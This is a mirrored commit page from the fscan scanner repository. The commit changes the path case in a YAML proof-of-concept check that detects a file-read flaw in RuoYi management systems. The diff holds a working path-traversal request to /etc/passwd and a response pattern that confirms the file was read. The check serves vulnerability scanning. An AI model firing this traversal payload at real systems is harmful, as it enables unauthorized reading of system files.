mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-22 03:10:42 +08:00
Update ruoyi-management-fileread.yml
This commit is contained in:
@@ -2,7 +2,7 @@ name: poc-yaml-ruoyi-management-fileread
|
|||||||
groups:
|
groups:
|
||||||
linux:
|
linux:
|
||||||
- method: GET
|
- method: GET
|
||||||
path: /Common/download/resource?resource=/profile/../../../../etc/passwd
|
path: /common/download/resource?resource=/profile/../../../../etc/passwd
|
||||||
expression: |
|
expression: |
|
||||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||||
windows:
|
windows:
|
||||||
|
|||||||
Reference in New Issue
Block a user